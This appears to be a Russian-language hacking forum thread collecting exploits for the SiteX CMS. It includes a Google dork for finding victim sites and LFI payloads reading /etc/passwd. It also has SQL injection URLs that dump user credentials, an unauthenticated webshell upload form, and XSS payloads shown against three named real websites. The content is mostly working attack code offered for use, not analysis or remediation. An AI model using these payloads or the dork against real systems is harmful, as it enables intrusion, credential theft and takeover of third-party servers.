Уязвимости SiteX 0.7 Beta download: http://jaist.dl.sourceforge.net/sourceforge/sitex/SiteX_074_build_418.zip dork: "Powered by SiteX 0.7 Beta" (выдачу гугла больше 10 линков не ставьте ) 1) [LFI] (требования: magic_quotes=off, register_globals=on) /themes/Corporate/homepage.php уязвимый код: PHP: include("themes/$THEME_FOLDER/header.php"); эксплуатирование: Code: /themes/Corporate/homepage.php?THEME_FOLDER=../../../../../../../../etc/passwd%00 2) [SQL-injection] (требования: magic_quotes=off, register_globals=on) links.php уязвимый код: PHP: if($category) { $query = "SELECT * FROM $DB_Links_Groups WHERE id='$category'"; $result = mysql_query($query, $Link) or queryError("8", mysql_error()); эксплуатирование: Code: /links.php?category=-1'+union+select+1,concat_ws(0x3a,username,password),3+from+sitex_users--+ P.S: шелл в админке аплоадится без проблем
Уязвимости SiteX 0.7 Beta Product : SiteX 0.7.4 build 405 PHPinfo Code: http://localhost/setup/phpinfo.php LFI PHP: include("themes/$THEME_FOLDER/header.php"); magic_quotes=off register_globals=on results : Code: http://localhost//themes/Fusion/homepage.php?THEME_FOLDER=../../../[...]%00 Code: http://localhost//themes/Joombo/homepage.php?THEME_FOLDER=../../../[...]%00 Code: http://localhost//themes/Streamline/homepage.php?THEME_FOLDER=../../../[...]%00 Code: http://localhost//themes/Structure/homepage.php?THEME_FOLDER=../../../[...]%00 SQL Injection magic_quotes=off, register_globals=on photo.php PHP: $query = "SELECT * FROM $DB_Photos WHERE id='$photoid'"; $result = mysql_query($query, $Link) or queryError("11", mysql_error()); $sxPhoto = mysql_fetch_object($result); $sxNewViews = $sxPhoto->views + 1; $sxQuery2 = "UPDATE $DB_Photos SET views='$sxNewViews' WHERE id='$photoid'"; $sxResult2 = mysql_query($sxQuery2, $Link) or queryError("10", mysql_error()); $queryA = "SELECT * FROM $DB_Photos_Albums WHERE id='$albumid'"; $resultA = mysql_query($queryA, $Link) or queryError("12", mysql_error()); $ROWA = mysql_fetch_object($resultA); result : Code: http://localhost/photo.php?photoid=4&albumid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8--+ SQL injection in Admin Panel magic_quotes=off, register_globals=on admin/page_edit.php PHP: $result = mysql_query($query, $Link) or queryError("38", mysql_error()); $query = "DELETE FROM $DB_Pages_Private WHERE pageid='$pageid'"; $result = mysql_query($query, $Link) or queryError("38", mysql_error()); if($private) { foreach ($user_types as $k => $v) { $query = "INSERT INTO $DB_Pages_Private (pageid, typeid) VALUES ('$pageid', '$k')"; $result = mysql_query($query, $Link) or queryError("38", mysql_error()); } } header("Location: ../page.php?pageid=$pageid&message=".str_replace(" ","_",$sxLang['MessagePageEdited'])); die(); } $query = "SELECT * FROM $DB_Pages WHERE id='$pageid'"; result : Code: 
http://localhost/admin/page_edit.php?pageid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7--+ admin/journal_edit.php PHP: $query = "UPDATE $DB_Journal SET title='$title', entry='$content', timestamp='$timestamp', month='$date_month', day='$date_day', year='$date_year' WHERE id='$entryid'"; $result = mysql_query($query, $Link) or queryError("21", mysql_error()); writeRSSXML(); header("Location: ../journal.php?sxEntryID=$entryid&message=".str_replace(" ","_",$sxLang['MessageJournalEdited'])); die(); //$message = $sxLang['MessageJournalEdited']; } $query = "SELECT * FROM $DB_Journal WHERE id='$entryid'"; $result = mysql_query($query, $Link) or queryError("21", mysql_error()); $ROW = mysql_fetch_object($result); result : Code: http://localhost/admin/journal_edit.php?entryid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8--+
5 копеек..) ------- 1) SQL injection (требования: mq=off, любой аккаунт) file:/admin/profile_view.php PHP: $query2 = "SELECT * FROM $DB_Users, $DB_Users_Assoc, $DB_Users_Types WHERE $DB_Users.username='$user' AND $DB_Users.id=$DB_Users_Assoc.userid AND $DB_Users_Assoc.typeid=$DB_Users_Types.id"; $result2 = mysql_query($query2, $Link) or queryError("402", mysql_error()); result: Code: /admin/profile_view.php?user=-123456'+union+select+1,User(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+ 2) blind SQL injection (требования: mq=off, желательно MySQL 5-й ветки) file: /forums_topic.php PHP: $query = "SELECT * FROM $DB_Forums_Posts WHERE id='$topicid'"; $result = mysql_query($query, $Link) or queryError("71", mysql_error()); result: Code: /forums_topic.php?topicid=1'+and+(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)+--+ //много скуль..
Внесу свой посильный вклад. [Version 0.8.0 RC 3 build 524] Заливка шелла. Не требуется ни прав, ни авторизации, ни чего-либо ещё: скрипт не проверяет ни сессию, ни значение параметра folder, ни имя и расширение файла (проверка расширения закомментирована). File: includes/uploadify/uploadify.php PHP: if (!empty($_FILES)) { $tempFile = $_FILES['Filedata']['tmp_name']; $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/'; $targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name']; // $fileTypes = str_replace('*.','',$_REQUEST['fileext']); // $fileTypes = str_replace(';','|',$fileTypes); // $typesArray = split('\|',$fileTypes); // $fileParts = pathinfo($_FILES['Filedata']['name']); // if (in_array($fileParts['extension'],$typesArray)) { // Uncomment the following line if you want to make the directory if it doesn't exist // mkdir(str_replace('//','/',$targetPath), 0755, true); move_uploaded_file($tempFile,$targetFile); echo "1"; // } else { // echo 'Invalid file type.'; // } } Target: Exploit ^_^ Code: <form enctype="multipart/form-data" action="http://targethost.com/includes/uploadify/uploadify.php" method="post" > <input type="file" name="Filedata" /><input type="submit" /> <input type="text" name="folder" /> </form> Если же администратор сайта раскомментирует закомментированные по умолчанию строки, то допустимые расширения файлов всё равно можно будет передать в параметре fileext, указав там .php, — список разрешённых расширений тоже берётся из запроса.
XSS Эксплуатация: Code: /index.php?sxMonth=1&sxYear=<scripT>alert('xss')</scripT> Примеры: Code: http://www.kolaewuosho.com/index.php?sxMonth=1&sxYear=<scripT>alert('ololo')</scripT> http://el-mirador.eu/index.php?sxMonth=1&sxYear=<scripT>alert('ololo')</scripT> http://www.thecocktailchefatlanta.com/index.php?sxMonth=1&sxYear=<scripT>alert(document.cookie)</scripT>